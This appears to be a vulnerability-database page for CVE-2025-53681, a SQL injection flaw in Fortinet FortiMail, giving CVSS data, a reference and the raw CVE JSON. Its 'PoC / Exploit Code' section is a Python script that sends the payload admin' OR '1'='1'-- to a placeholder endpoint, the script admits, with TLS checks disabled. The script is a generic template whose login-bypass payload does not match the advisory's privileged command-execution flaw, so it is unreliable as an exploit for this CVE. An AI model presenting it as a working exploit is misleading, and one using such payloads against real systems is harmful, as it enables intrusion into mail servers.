Security Vulnerability Report
CVE-2025-53681 CVSS 7.2 HIGH

CVE-2025-53681

Published: 2026-05-12 18:16:36
Last Modified: 2026-05-12 18:57:02

Description

An improper neutralization of special elements used in an SQL command ("SQL Injection") vulnerability [CWE-89] in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, and FortiMail 7.2.0 through 7.2.8 allows an authenticated, privileged attacker to execute unauthorized code or commands via specifically crafted HTTP or HTTPS requests.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FortiMail 7.6.0 - 7.6.3
FortiMail 7.4.0 - 7.4.5
FortiMail 7.2.0 - 7.2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: Fortinet FortiMail SQL Injection PoC (CVE-2025-53681)
# Description: This script demonstrates sending a crafted request to trigger the SQLi.
# Note: Requires an authenticated, high-privileged session.

# Placeholder target: the advisory on this page does not name the affected endpoint,
# so "/api/vulnerable_endpoint" is a stand-in, not a real FortiMail path.
target_url = "https://<fortimail-ip>/api/vulnerable_endpoint"

# Session cookies of the high-privilege account (placeholders)
cookies = {
    "CCSRFToken": "<valid_csrf_token>",
    "ADSESSIONID": "<valid_session_id>",
}

# Request headers
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded",
}

# Payload used to test for SQL injection
# Example: attempting to bypass logic or extract data
payload = "admin' OR '1'='1'--"

data = {
    "username": payload,
    "submit": "submit",
}

try:
    # verify=False disables TLS certificate validation (appliances often use self-signed certs)
    response = requests.post(
        target_url,
        headers=headers,
        cookies=cookies,
        data=data,
        verify=False,
        timeout=10,
    )
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text[:500])  # Print first 500 chars of response
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-132

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-53681",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T18:16:35.860",
    "lastModified": "2026-05-12T18:57:02.307",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An improper neutralization of special elements used in an SQL Command (\"SQL Injection&\") vulnerability [CWE-89] vulnerability in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, FortiMail 7.2.0 through 7.2.8 allows an authenticated privileged attacker to execute unauthorized code or commands via specifically crafted HTTP or HTTPS requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-132",
        "source": "[email protected]"
      }
    ]
  }
}